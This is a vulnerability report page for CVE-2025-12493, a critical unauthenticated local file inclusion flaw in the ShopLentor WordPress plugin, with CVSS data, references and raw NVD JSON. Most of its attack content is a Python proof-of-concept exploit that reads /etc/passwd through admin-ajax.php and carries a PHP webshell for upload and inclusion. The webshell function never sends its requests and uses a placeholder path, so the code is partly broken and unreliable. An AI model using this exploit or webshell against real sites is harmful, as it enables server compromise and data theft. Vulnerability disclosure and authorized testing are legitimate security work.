Security Vulnerability Report
CVE-2025-12493 CVSS 9.8 CRITICAL

CVE-2025-12493

Published: 2025-11-04 12:15:37
Last Modified: 2025-11-26 14:41:40

Description

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.2.5 via the 'load_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hasthemes:shoplentor:*:*:*:*:*:wordpress:*:* - VULNERABLE
ShopLentor (WooLentor) <= 3.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12493 PoC - ShopLentor LFI Vulnerability
# Target: WordPress site with ShopLentor plugin <= 3.2.5

TARGET = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'


# LFI via load_template function
# Attack vector: Include arbitrary .php files
def exploit_lfi(target, filename='/etc/passwd'):
    """Exploit local file inclusion via load_template"""
    endpoint = f"{target}/wp-admin/admin-ajax.php"

    # Payload for LFI via wl_load_template action
    data = {
        'action': 'wl_load_template',
        'file': filename  # Path traversal possible
    }

    print(f"[*] Targeting: {target}")
    print(f"[*] Requesting file: {filename}")

    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")

        if response.status_code == 200 and 'root:' in response.text:
            print("[!] VULNERABLE - File inclusion successful!")
            print(response.text[:500])
            return True
        else:
            print("[-] Target may not be vulnerable")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


# Alternative: Upload and include webshell
def upload_and_include(target, webshell_path):
    """Upload PHP shell and include it for RCE"""
    upload_endpoint = f"{target}/wp-admin/admin-ajax.php"

    # Upload malicious file
    files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
    data = {'action': 'woolentor_upload_file'}

    # Then include the uploaded file
    include_data = {
        'action': 'wl_load_template',
        'file': '/path/to/uploaded/shell.php'
    }

    print("[*] Uploading webshell...")
    print("[*] Including uploaded file for RCE...")


if __name__ == '__main__':
    print("CVE-2025-12493 PoC - ShopLentor LFI")
    exploit_lfi(TARGET, '/etc/passwd')
```

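References

https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L213
https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L241
https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L42
https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/addons/product-grid/base/class.product-grid-base.php#L378
https://plugins.trac.wordpress.org/changeset/3388234/
https://www.wordfence.com/threat-intel/vulnerabilities/id/12bb4bb9-e908-43ad-8fb1-59418580f5e1?source=cve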

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12493", "sourceIdentifier": "[email protected]", "published": "2025-11-04T12:15:36.957", "lastModified": "2025-11-26T14:41:39.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.2.5 via the 'load_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hasthemes:shoplentor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.2.6", "matchCriteriaId": "933798AC-CE46-4823-80D4-4E91DA26FCA8"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L213", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L241", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L42", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/addons/product-grid/base/class.product-grid-base.php#L378", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3388234/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/12bb4bb9-e908-43ad-8fb1-59418580f5e1?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}